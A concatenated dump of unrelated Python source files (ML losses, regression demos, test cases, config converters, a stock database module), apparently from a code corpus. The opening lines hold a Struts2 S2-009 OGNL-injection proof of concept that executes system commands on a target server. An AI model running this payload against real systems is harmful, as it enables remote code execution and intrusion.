print('test {} --> struts2_009'.format(url))
url += "/ajax/example5.action"
#执行ls 命令
exp = "?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1"
#exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
url += exp
try:
resp = requests.get(url, timeout=10)
print(resp)
if resp.status_code == 200:
print('test --> struts2_009 Success!')
return True
except:
print('test --> struts2_009 Failed!')
return False
return False
if __name__ == "__main__":
print(poc('http://127.0.0.1:8080')) |
peeringdb_server/client_adaptor/setup.py | CyberFlameGO/peeringdb | 224 | 12658052 | <filename>peeringdb_server/client_adaptor/setup.py
"""
django-peeringdb backend setup (needed for pdb_load_data command)
"""
from django_peeringdb.client_adaptor.setup import configure # noqa
|
rlgraph/components/loss_functions/euclidian_distance_loss.py | RLGraph/RLGraph | 290 | 12658061 | <gh_stars>100-1000
# Copyright 2018/2019 ducandu GmbH, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
from rlgraph import get_backend
from rlgraph.components.loss_functions.supervised_loss_function import SupervisedLossFunction
from rlgraph.spaces.bool_box import BoolBox
from rlgraph.utils.decorators import rlgraph_api
if get_backend() == "tf":
import tensorflow as tf
class EuclidianDistanceLoss(SupervisedLossFunction):
"""
Calculates the loss between two vectors (prediction and label) via their Euclidian distance:
d(v,w) = SQRT(SUMi( (vi - wi)² ))
"""
def __init__(self, time_steps=None, scope="euclidian-distance", **kwargs):
"""
Args:
time_steps (Optional[int]): If given, reduce-sum linearly over this many timesteps with weights going
from 0.0 (first time-step) to 1.0 (last-timestep).
"""
super(EuclidianDistanceLoss, self).__init__(scope=scope, **kwargs)
self.time_steps = time_steps
self.reduce_ranks = None
self.time_rank = None
self.time_major = None
self.is_bool = None
def check_input_spaces(self, input_spaces, action_space=None):
in_space = input_spaces["labels"]
self.is_bool = isinstance(in_space, BoolBox) # Need to cast (to 0.0 and 1.0) in graph_fn?
self.reduce_ranks = np.array(list(range(in_space.rank)))
if in_space.has_batch_rank:
self.reduce_ranks += 1
if in_space.has_time_rank:
self.reduce_ranks += 1
self.time_rank = in_space.has_time_rank
self.time_major = in_space.time_major
@rlgraph_api
def _graph_fn_loss_per_item(self, parameters, labels, sequence_length=None, time_percentage=None):
"""
Euclidian distance loss.
Args:
parameters (SingleDataOp): Output predictions.
labels (SingleDataOp): Labels.
sequence_length (SingleDataOp): The lengths of each sequence (if applicable) in the given batch.
Returns:
SingleDataOp: The loss values vector (one single value for each batch item).
"""
batch_rank = 0 if self.time_major is False else 1
time_rank = 0 if batch_rank == 1 else 1
if get_backend() == "tf":
# Reduce over last rank (vector axis) and take the square root.
if self.is_bool:
labels = tf.cast(labels, tf.float32)
parameters = tf.cast(parameters, tf.float32)
euclidian_distance = tf.square(tf.subtract(parameters, labels))
euclidian_distance = tf.reduce_sum(euclidian_distance, axis=self.reduce_ranks)
euclidian_distance = tf.sqrt(euclidian_distance)
# TODO: Make it possible to customize the time-step decay (or increase?) behavior.
# Weight over time-steps (linearly decay weighting over time rank, cutting out entirely values past the
# sequence length).
if sequence_length is not None:
max_time_steps = tf.cast(tf.shape(labels)[time_rank], dtype=tf.float32)
sequence_mask = tf.sequence_mask(sequence_length, max_time_steps, dtype=tf.float32)
sequence_decay = tf.expand_dims(
tf.range(start=1.0, limit=0.0, delta=-1.0 / max_time_steps, dtype=tf.float32), axis=batch_rank
)
weighting = sequence_mask * sequence_decay
euclidian_distance = tf.multiply(euclidian_distance, weighting)
# Reduce away the time-rank.
euclidian_distance = tf.reduce_sum(euclidian_distance, axis=time_rank)
euclidian_distance = tf.divide(euclidian_distance, tf.cast(sequence_length, dtype=tf.float32))
else:
# Reduce away the time-rank.
if hasattr(parameters, "_time_rank"):
euclidian_distance = tf.reduce_mean(euclidian_distance, axis=time_rank)
return euclidian_distance
|
recipes/Python/577371_sending_gmail_though_python_code/recipe-577371.py | tdiprima/code | 2,023 | 12658077 | #Sending an email through gmail using Python - <NAME>
import smtplib
fromaddr = '<EMAIL>'
toaddrs = '<EMAIL>'
msg = 'Email message from PYTHON Raghuram app'
#provide gmail user name and password
username = 'gmailUserName'
password = '<PASSWORD>'
# functions to send an email
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.ehlo()
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
|
maro/utils/exception/__init__.py | yangboz/maro | 598 | 12658091 | from .base_exception import MAROException
from .error_code import ERROR_CODE
__all__ = ["ERROR_CODE", "MAROException"]
|
scripts/probitRegDemo.py | vipavlovic/pyprobml | 4,895 | 12658107 | <filename>scripts/probitRegDemo.py<gh_stars>1000+
import superimport
import numpy as np
from scipy.stats import norm
from scipy.optimize import minimize
from matplotlib import pyplot as plt
from cycler import cycler
import jax.numpy as jnp
import jax.scipy.stats.norm as jnorm
from jax import grad
import pyprobml_utils as pml
from statsmodels.discrete.discrete_model import Probit
cb_color = ['#377eb8', '#ff7f00']
cb_cycler = (cycler(linestyle=['-', '--', '-.']) * cycler(color=cb_color))
plt.rc('axes', prop_cycle=cb_cycler)
np.random.seed(0)
class ProbitReg:
def __init__(self):
self.loglikehist = []
self.max_iter = 100
self.tolerance = 1e-4
self.w = []
# Probit-loss = (1-y)*log(1-gauss.cdf(X.w)) - (1-y)*log(gauss.cdf(-(X.w))
def probitloss(self, X, y, w): # NLL
return -jnp.sum(y * jnorm.logcdf(jnp.dot(X, w))) - \
jnp.sum((1 - y) * jnorm.logcdf(-jnp.dot(X, w)))
def objfn(self, X, y, w, lam): # penalized likelihood.
return jnp.sum(lam * jnp.square(w[1:])) - self.probitloss(X, y, w)
def probreg_fit_em(self, X, y, lam):
self.w = np.linalg.lstsq(
X + np.random.rand(X.shape[0], X.shape[1]), y, rcond=None)[0].reshape(-1, 1)
def estep(w):
u = X @ w
z = u + norm.pdf(u) / ((y == 1) - norm.cdf(-u))
loglik = self.objfn(X, y, w, lam)
return z, loglik
# M step function is the ridge regression
def mstep(X, y, lam):
return ridge_reg(X, y, lam)
i = 1
stop = False
while not stop:
z, loglike = estep(self.w)
self.loglikehist.append(loglike)
self.w = mstep(X, z, lam)
if i >= self.max_iter:
stop = True
elif i > 1:
# if slope becomes less than tolerance.
stop = np.abs((self.loglikehist[i - 1] - self.loglikehist[i - 2]) / (
self.loglikehist[i - 1] + self.loglikehist[i - 2])) <= self.tolerance / 2
i += 1
self.loglikehist = self.loglikehist[0:i - 1]
return self.w, np.array(self.loglikehist)
def probit_reg_fit_gradient(self, X, y, lam):
winit = jnp.linalg.lstsq(
X + np.random.rand(X.shape[0], X.shape[1]), y, rcond=None)[0].reshape(-1, 1)
self.loglikehist = []
self.loglikehist.append((-self.objfn(X, y, winit, lam)))
def obj(w):
w = w.reshape(-1, 1)
# PNLL
return self.probitloss(X, y, w) + jnp.sum(lam * jnp.square(w[1:]))
def grad_obj(w):
return grad(obj)(w)
def callback(w):
loglik = obj(w) # LL
self.loglikehist.append(loglik)
res = minimize(
obj,
x0=winit,
jac=grad_obj,
callback=callback,
method='BFGS')
return res['x'], np.array(self.loglikehist[0:-1])
def predict(self, X, w):
p = jnorm.cdf(jnp.dot(X, w))
y = np.array((p > 0.5), dtype='int32')
return y, p
# using matrix inversion for ridge regression
def ridge_reg(X, y, lambd): # returns weight vectors.
D = X.shape[1]
w = np.linalg.inv(X.T @ X + lambd * np.eye(D, D)) @ X.T @ y
return w
def flip_bits(y, p):
x = np.random.rand(y.shape[0], 1) < p
y[x < p] = 1 - y[x < p]
return y
n, d = 100, 2
data_x = np.random.randn(n, d)
w = np.random.randn(d, 1)
data_y = flip_bits((data_x @ w > 0), 0)
lam = 1e-2
# statsmodel.Probit
sm_probit_reg = Probit(exog=data_x, endog=data_y).fit(disp=0, method='bfgs')
sm_probit_prob = sm_probit_reg.predict(exog=data_x)
# Our Implementation:
probit_reg = ProbitReg()
# EM:
em_w, obj_trace_em = probit_reg.probreg_fit_em(data_x, data_y, lam)
em_ypred, em_prob = probit_reg.predict(data_x, em_w)
# gradient:
gradient_w, obj_trace_gradient = probit_reg.probit_reg_fit_gradient(
data_x, data_y, lam)
gradient_ypred, gradient_prob = probit_reg.predict(data_x, gradient_w)
plt.figure()
plt.plot(sm_probit_prob, em_prob, 'o')
plt.xlabel('statsmodel.probit')
plt.ylabel('em')
plt.figure()
plt.plot(gradient_prob, em_prob, 'o')
plt.xlabel('bfgs')
plt.ylabel('em')
plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))
plt.show()
plt.figure()
plt.plot(-obj_trace_em.flatten(), '-o', linewidth=2)
plt.plot(obj_trace_gradient.flatten(), ':s', linewidth=1)
plt.legend(['em', 'bfgs'])
plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))
plt.ylabel('logpost')
plt.xlabel('iter')
pml.save_fig('../figures/probitRegDemoNLL.pdf')
plt.show()
|
koku/masu/test/processor/azure/test_azure_report_charge_updater.py | rubik-ai/koku | 157 | 12658142 | <reponame>rubik-ai/koku
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the AzureCostModelCostUpdater object."""
from masu.database.azure_report_db_accessor import AzureReportDBAccessor
from masu.external.date_accessor import DateAccessor
from masu.processor.azure.azure_cost_model_cost_updater import AzureCostModelCostUpdater
from masu.test import MasuTestCase
class AzureCostModelCostUpdaterTest(MasuTestCase):
"""Test Cases for the AzureCostModelCostUpdater object."""
def test_azure_update_summary_cost_model_costs(self):
"""Test to verify Azure derived cost summary is calculated."""
updater = AzureCostModelCostUpdater(schema=self.schema, provider=self.azure_provider)
start_date = DateAccessor().today_with_timezone("UTC")
bill_date = start_date.replace(day=1).date()
updater.update_summary_cost_model_costs()
with AzureReportDBAccessor(self.schema) as accessor:
bill = accessor.get_cost_entry_bills_by_date(bill_date)[0]
self.assertIsNotNone(bill.derived_cost_datetime)
|
Python/hello_waldo.py | saurabhcommand/Hello-world | 1,428 | 12658143 | <gh_stars>1000+
print('Hello Waldo!')
|
etc/converter/convert-to-FfDL.py | adrian555/FfDL | 680 | 12658163 | <filename>etc/converter/convert-to-FfDL.py
#
# Copyright 2017-2018 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from ruamel.yaml import YAML
import sys
import getopt
#global variables
language = ''
inputfile = ''
outputfile = ''
samplefile = ''
yaml=YAML(typ='safe')
def getFfDL():
try:
f = open(inputfile, "r")
response = f.read()
data = yaml.load(response)
f.close()
return data
except:
print("Missing {}".format(inputfile))
def getSampleJob():
try:
if samplefile:
f = open(samplefile,"r")
else:
f = open("sample-FfDL.yaml","r")
response = f.read()
resYaml = yaml.load(response)
f.close()
return resYaml
except:
print("Missing sample-FfDL.yaml")
def createJob(sample,data):
try:
sample['framework']['name'] = data['model_definition']['framework']['name']
sample['name'] = data['model_definition']['name']
sample['description'] = data['model_definition']['description']
sample['framework']['command'] = data['model_definition']['execution']['command']
sample['data_stores'][0]['id'] = data['training_data_reference']['name']
sample['data_stores'][0]['connection']['auth_url'] = data['training_data_reference']['connection']['endpoint_url']
sample['data_stores'][0]['connection']['user_name'] = data['training_data_reference']['connection']['access_key_id']
sample['data_stores'][0]['connection']['password'] = data['training_data_reference']['connection']['secret_access_key']
sample['data_stores'][0]['training_data']['container'] = data['training_data_reference']['source']['bucket']
sample['data_stores'][0]['training_results']['container'] = data['training_results_reference']['target']['bucket']
py2 = False
CPU = False
try:
if data['model_definition']['framework']['name'] == 'tensorflow':
if '2.' in data['model_definition']['framework']['runtimes']['version']:
py2 = True
except:
py2 = False
try:
sample['learners'] = int(data['model_definition']['execution']['compute_configuration']['nodes'])
except:
sample['learners'] = 1
# Detect T-shirt requirements
if data['model_definition']['execution']['compute_configuration']['name'] == "k80":
sample['cpus'] = 4
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "p100":
sample['cpus'] = 8
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "v100":
sample['cpus'] = 26
sample['gpus'] = 1
sample['memory'] = '24Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "k80x2":
sample['cpus'] = 8
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "p100x2":
sample['cpus'] = 16
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "v100x2":
sample['cpus'] = 52
sample['gpus'] = 2
sample['memory'] = '48Gb'
elif data['model_definition']['execution']['compute_configuration']['name'] == "k80x4":
sample['cpus'] = 16
sample['gpus'] = 4
sample['memory'] = '96Gb'
else:
CPU = True
sample['cpus'] = 1
sample['gpus'] = 0
sample['memory'] = '1Gb'
# Detect Framework version
try:
if data['model_definition']['framework']['name'] == 'tensorflow':
if '1.3' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.3.0"
else:
sample['framework']['version'] = "1.3.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.3.0-py3"
else:
sample['framework']['version'] = "1.3.0-gpu-py3"
elif '1.4' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.4.0"
else:
sample['framework']['version'] = "1.4.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.4.0-py3"
else:
sample['framework']['version'] = "1.4.0-gpu-py3"
elif '1.5' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.5.0"
else:
sample['framework']['version'] = "1.5.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.5.0-py3"
else:
sample['framework']['version'] = "1.5.0-gpu-py3"
elif '1.6' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.6.0"
else:
sample['framework']['version'] = "1.6.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.6.0-py3"
else:
sample['framework']['version'] = "1.6.0-gpu-py3"
elif '1.7' in data['model_definition']['framework']['version']:
if py2:
if CPU:
sample['framework']['version'] = "1.7.0"
else:
sample['framework']['version'] = "1.7.0-gpu"
else:
if CPU:
sample['framework']['version'] = "1.7.0-py3"
else:
sample['framework']['version'] = "1.7.0-gpu-py3"
else:
if py2:
if CPU:
sample['framework']['version'] = "latest"
else:
sample['framework']['version'] = "latest-gpu"
else:
if CPU:
sample['framework']['version'] = "latest-py3"
else:
sample['framework']['version'] = "latest-gpu-py3"
elif data['model_definition']['framework']['name'] == 'caffe':
if CPU:
sample['framework']['version'] = "cpu"
else:
sample['framework']['version'] = "gpu"
elif data['model_definition']['framework']['name'] == 'pytorch':
sample['framework']['version'] = "latest"
except:
print("Wrong framework.version contents in {}".format(inputfile))
if data['model_definition']['framework']['name'] != "tensorflow":
sample.pop('evaluation_metrics', None)
except:
print("Missing contents in {}".format(inputfile))
try:
if outputfile:
f = open(outputfile, "w")
else:
f = open("manifest-FfDL.yaml", "w")
yaml.default_flow_style = False
yaml.dump(sample, f)
f.close()
except:
if outputfile:
print("Cannot write contents to {}".format(outputfile))
else:
print("Cannot write contents to manifest-FfDL.yaml.")
if __name__ == "__main__":
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv,"i:o:s:",["ifile=","ofile=","sfile="])
except getopt.GetoptError:
print('Format Error: Wrong format.')
print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
elif opt in ("-s", "--sfile"):
samplefile = arg
if not inputfile:
print('Input Error: inputfile cannot be empty.')
print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')
sys.exit(2)
data = getFfDL()
sample = getSampleJob()
createJob(sample,data)
|
OnePy/sys_module/components/market_maker.py | Chandlercjy/OnePyfx | 321 | 12658175 | import arrow
from OnePy.constants import EVENT
from OnePy.sys_module.components.exceptions import (BacktestFinished,
BlowUpError)
from OnePy.sys_module.metabase_env import OnePyEnvBase
from OnePy.sys_module.models.base_bar import BarBase
from OnePy.sys_module.models.calendar import Calendar
class MarketMaker(OnePyEnvBase):
calendar: Calendar = None
@classmethod
def update_market(cls):
try:
cls.env.cur_suspended_tickers.clear()
cls.calendar.update_calendar()
cls._update_bar()
cls._update_recorder()
cls._check_blowup()
cls.env.event_engine.put(EVENT.Market_updated)
except (BacktestFinished, BlowUpError):
cls._update_recorder(final=True) # 最后回测结束用close更新账户信息
raise BacktestFinished
@classmethod
def initialize(cls):
cls.env.logger.critical(f"正在初始化OnePy")
cls._initialize_calendar()
cls._initialize_feeds()
cls._initialize_cleaners()
cls.env.logger.critical(f"{'='*15} OnePy初始化成功! {'='*15}")
cls.env.logger.critical("开始寻找OnePiece之旅~~~")
@classmethod
def _initialize_calendar(cls):
cls.calendar = Calendar(cls.env.instrument)
@classmethod
def _initialize_feeds(cls):
for value in list(cls.env.readers.values()):
if value.ticker: # 若以key命名的,不作为ticker初始化
ohlc_bar = cls.get_bar(value.ticker, cls.env.sys_frequency)
if ohlc_bar.initialize(buffer_day=7):
cls.env.tickers.append(value.ticker)
cls.env.feeds.update({value.ticker: ohlc_bar})
@classmethod
def _initialize_cleaners(cls):
for ticker in list(cls.env.tickers):
for cleaner in list(cls.env.cleaners.values()):
bufferday = cleaner.buffer_day
cleaner.initialize_buffer_data(ticker, bufferday)
@classmethod
def _update_recorder(cls, final=False):
for recorder in cls.env.recorders.values():
recorder.update(order_executed=final)
@classmethod
def _check_blowup(cls):
if cls.env.recorder.balance.latest() <= 0:
cls.env.logger.critical("The account is BLOW UP!")
raise BlowUpError
@classmethod
def _update_bar(cls):
for ticker in cls.env.tickers:
iter_bar = cls.env.feeds[ticker]
try:
iter_bar.next()
except StopIteration:
todate = arrow.get(cls.env.todate).format(
"YYYY-MM-DD HH:mm:ss")
if cls.env.sys_date == todate:
if cls.env.is_show_today_signals:
iter_bar.move_next_ohlc_to_cur_ohlc()
else:
raise BacktestFinished
else:
cls.env.cur_suspended_tickers.append(ticker)
cls.env.suspended_tickers_record[ticker].append(
cls.env.sys_date)
@classmethod
def get_bar(cls, ticker, frequency) -> BarBase:
return cls.env.recorder.bar_class(ticker, frequency)
|
wooey/migrations/0014_wooeyjob_uuid_finalise.py | fridmundklaus/wooey | 1,572 | 12658202 | <reponame>fridmundklaus/wooey
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
class Migration(migrations.Migration):
dependencies = [
('wooey', '0013_wooeyjob_uuid_populate'),
]
operations = [
# Set to unique=True
migrations.AlterField(
model_name='wooeyjob',
name='uuid',
field=models.CharField(default=uuid.uuid4, unique=True, max_length=255),
),
]
|
core/envs/lab.py | R3NI3/pytorch-rl | 851 | 12658283 | <filename>core/envs/lab.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from copy import deepcopy
from gym.spaces.box import Box
import inspect
from utils.helpers import Experience # NOTE: here state0 is always "None"
from utils.helpers import preprocessAtari, rgb2gray, rgb2y, scale
from core.env import Env
class LabEnv(Env):
def __init__(self, args, env_ind=0):
super(LabEnv, self).__init__(args, env_ind)
assert self.env_type == "lab"
|
aim/sdk/objects/audio.py | avkudr/aim | 2,195 | 12658293 | import io
import logging
import os.path
from aim.sdk.num_utils import inst_has_typename
from aim.sdk.objects.io import wavfile
from aim.storage.object import CustomObject
from aim.storage.types import BLOB
logger = logging.getLogger(__name__)
@CustomObject.alias('aim.audio')
class Audio(CustomObject):
"""Audio object used to store audio objects in Aim repository..
Currently, audio formats are limited to mp3, wav, flac
Args:
data: file path, bytes, io.BaseIO or numpy.array (only for WAV)
format (:obj:`str`): Format of the audio source
rate (:obj:`int`): Rate of the audio file, for WAV defaults to 22500
caption (:obj:`str`, optional): Optional audio caption. '' by default.
"""
AIM_NAME = 'aim.audio'
# supported audio formats
UNKNOWN = ''
MP3 = 'mp3'
WAV = 'wav'
FLAC = 'flac'
audio_formats = (MP3, WAV, FLAC)
def __init__(self, data, format: str = '', caption: str = '', rate: int = None):
super().__init__()
audio_format = format.lower()
if inst_has_typename(data, ['ndarray.numpy']):
# Currently, only WAV audio formats are supported for numpy
audio_format = self.WAV
if not rate:
rate = 22500
logger.info(f'Parameter "rate" is not provided! Using default: {rate}')
bs = wavfile.write(rate, data)
data = bs
# act as a regular file with enforced audio format definition by user side
if not audio_format:
raise ValueError('Audio format must be provided.')
elif audio_format not in self.audio_formats:
raise ValueError(f'Invalid audio format is provided. Must be one of {self.audio_formats}')
if isinstance(data, str):
if not os.path.exists(data) or not os.path.isfile(data):
raise ValueError('Invalid audio file path')
with open(data, 'rb') as FS:
data = FS.read()
elif isinstance(data, io.BytesIO):
data = data.read()
if not isinstance(data, bytes):
raise TypeError('Content is not a byte-stream object')
extra = {
'caption': caption,
'format': audio_format
}
self._prepare(data, **extra)
def _prepare(self, data, **extra) -> None:
assert isinstance(data, bytes)
for k, v in extra.items():
self.storage[k] = v
self.storage['data'] = BLOB(data=data)
def to_numpy(self):
"""
This method converts WAV to Numpy array.
Other audio formats are not supported at this moment.
Returns: numpy array
"""
assert self.storage['format'] == self.__audio_format_map[self.WAV]
return wavfile.read(self.get())
def get(self) -> io.BytesIO:
"""
Reads data from the inner container and writes it to a buffer
Returns: io.BytesIO
"""
bs = self.storage.get('data')
if not bs:
return io.BytesIO()
return io.BytesIO(bytes(bs))
|
appendix/check_diff_upresnet10.py | ly17java8-yangsen/waifu2x-caffe | 7,366 | 12658318 | <reponame>ly17java8-yangsen/waifu2x-caffe
import os
import os.path as osp
import sys
import google.protobuf as pb
from argparse import ArgumentParser
import numpy as np
import shutil
import caffe
from caffe.proto import caffe_pb2
sys.path.append('waifu2x-chainer')
from lib import srcnn
import chainer
def main():
caffe.set_mode_cpu()
model_name = 'UpResNet10'
model_dir = 'waifu2x-chainer/models/{}'.format(model_name.lower())
model_class = srcnn.archs[model_name]
for filename in os.listdir(model_dir):
basename, ext = os.path.splitext(filename)
if ext == '.npz':
model_path = os.path.join(model_dir, filename)
print(model_path)
channels = 3 if 'rgb' in filename else 1
model = model_class(channels)
chainer.serializers.load_npz(model_path, model)
model.to_cpu()
params = {}
for path, param in model.namedparams():
params[path] = param.array
net = caffe.Net('upresnet10_3.prototxt', caffe.TEST)
for key in net.params:
l = len(net.params[key])
net.params[key][0].data[...] = params[key + '/W']
if l >= 2:
net.params[key][1].data[...] = params[key + '/b']
input_data = np.empty(net.blobs['input'].data.shape, dtype=np.float32)
input_data[...] = np.random.random_sample(net.blobs['input'].data.shape)
net.blobs['input'].data[...] = input_data
ret = net.forward()
input_data = np.empty(net.blobs['input'].data.shape, dtype=np.float32)
input_data[...] = np.random.random_sample(net.blobs['input'].data.shape)
net.blobs['input'].data[...] = input_data
ret = net.forward()
batch_y = model(input_data)
print(batch_y.array - ret['/conv_post'])
if __name__ == '__main__':
caffe.init_log(3)
main()
|
resources/utility_scripts/process_subjects.py | inaccel/TractSeg | 148 | 12658342 | <reponame>inaccel/TractSeg
"""
Random code for testing purposes
"""
from pathlib import Path
import subprocess as sp
from p_tqdm import p_map
import numpy as np
def run_tractseg(subject_id):
# dir = base / subject_id
dir = base / subject_id / "session_1"
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type endings_segmentation --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type TOM --preview", shell=True)
sp.call(f"Tracking -i {dir}/peaks.nii.gz --tracking_format tck --algorithm prob --test 3", shell=True)
# sp.call(f"Tractometry -i {dir}/tractseg_output/TOM_trackings " +
# f"-o {dir}/tractseg_output/Tractometry.csv " +
# f"-e {dir}/tractseg_output/endings_segmentations -s {dir}/FA.nii.gz --tracking_format tck",
# shell=True)
if __name__ == '__main__':
# base = Path("/mnt/nvme/data/dwi/tractometry_test_subjectSpace")
base = Path("/mnt/nvme/data/dwi/tractseg_example")
# base = Path("/mnt/nvme/data/dwi/rotation_test")
# subjects = ["s01", "s02", "s03", "s04"]
subjects = ["s01"]
# subjects = ["UZB"]
def process_subject(subject_id):
run_tractseg(subject_id)
p_map(process_subject, subjects, num_cpus=1, disable=False)
# Run Tractometry statistics
# cd /mnt/nvme/data/dwi/tractometry_test
# plot_tractometry_results -i subjects.txt -o tractometry_result_group.png --mc --save_csv --plot3D metric
|
flask_security/models/__init__.py | briancappello/flask-security | 317 | 12658351 | <gh_stars>100-1000
""""
Copyright 2019 by <NAME> (jwag). All rights reserved.
:license: MIT, see LICENSE for more details.
This packages contains OPTIONAL models for various ORMs/databases that can be used
to quickly get the required DB models setup.
These models have the fields for ALL features. This makes it easy for applications
to add features w/o a DB migration (and modern DBs are pretty efficient at storing
empty values!).
"""
|
lib/cheroot/__init__.py | 0x20Man/Watcher3 | 320 | 12658354 | """Cheroot is the high-performance, pure-Python HTTP server used by CherryPy."""
try:
import pkg_resources
except ImportError:
pass
try:
__version__ = pkg_resources.get_distribution('cheroot').version
except Exception:
__version__ = 'unknown'
|
stocklook/apis/yahoo_db/database.py | zbarge/stocklook | 149 | 12658357 | import datetime
import logging
import os
import pandas as pd
from sqlalchemy import create_engine, and_
from sqlalchemy.orm import sessionmaker
from yahoo_finance import Share, YQLResponseMalformedError
from stocklook.utils.formatters import get_stock_data, field_map, get_stock_data_historical
from .tables import Quote, Stock, Base, WatchList
logger = logging.getLogger()
logger.setLevel(logging.INFO)
DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data')
if not os.path.exists(DATA_DIR):
os.mkdir(DATA_DIR)
DEFAULT_DATABASE_PATH = os.path.join(DATA_DIR, 'db.sqlite3')
engine = create_engine('sqlite:///' + DEFAULT_DATABASE_PATH)
Session = sessionmaker(bind=engine)
stock_keys = Stock.__dict__.keys()
quote_keys = Quote.__dict__.keys()
class StockDatabase:
STOCK_TIMES = [[5, 30], [13, 30]]
def __init__(self, symbols=None):
Base.metadata.create_all(bind=engine, checkfirst=True)
self._symbols = symbols
def _add_stock(self, session, name, data=None):
if data is None:
try:
data = get_stock_data(Share(name), field_map)
except:
return None
stock = Stock(**{k: v for k, v in data.items() if k in stock_keys})
try:
session.add(stock)
except:
pass
return data
def seconds_until_market_open(self):
open, close = self.STOCK_TIMES
ohour, omin = open
chour, cmin = close
osec = (ohour*60*60) + (omin*60)
csec = (chour*60*60) + (cmin*60)
today = datetime.datetime.now()
tsec = (today.hour*60*60) + (today.minute*60)
weekday = today.weekday()
if weekday < 5:
add = 0
elif weekday == 5:
add = (48*60*60)-tsec
elif weekday == 6:
add = (24*60*60)-tsec
if tsec > csec:
sec = (24*60*60)-tsec+osec+add
#logger.info("STMO1: Stock market opens in {} hours".format(round(sec/60/60),2))
elif tsec < osec:
sec = osec-tsec+add
#logger.info("STMO2: Stock market opens in {} hours".format(round(sec / 60 / 60), 2))
else:
#logger.info("STMO3: Stock market is currently open")
sec = 0 + add
return sec
def get_quote_latest(self, session, stock):
return session.query(Quote)\
.filter(Quote.stock_id == stock.id)\
.order_by(Quote.date_inserted.desc())\
.limit(1)\
.one_or_none()
def get_quote(self, session, stock, data=None):
update_time = pd.Timestamp(datetime.datetime.now()) - pd.DateOffset(minutes=15)
if stock is None or not hasattr(stock, 'quotes') or not hasattr(stock, 'symbol'):
return None
seconds = self.seconds_until_market_open()
quote = self.get_quote_latest(session, stock)
market_closed = (seconds > 15*60)
if quote is None \
or (not market_closed and quote.date_inserted <= update_time)\
or (market_closed and quote.date_inserted.minute < 30 and quote.date_inserted.hour == 13):
if data is None:
data = get_stock_data(Share(stock.symbol), field_map)
quote = Quote(**{k: v
for k, v in data.items()
if k in quote_keys})
logger.info("UPDATED QUOTE: {}".format(quote))
stock.quotes.append(quote)
else:
logging.info("EXISTING QUOTE: {}".format(quote))
return quote
def get_quotes(self, session, stocks):
return [self.get_quote(session, s) for s in stocks]
def get_stock(self, session, symbol):
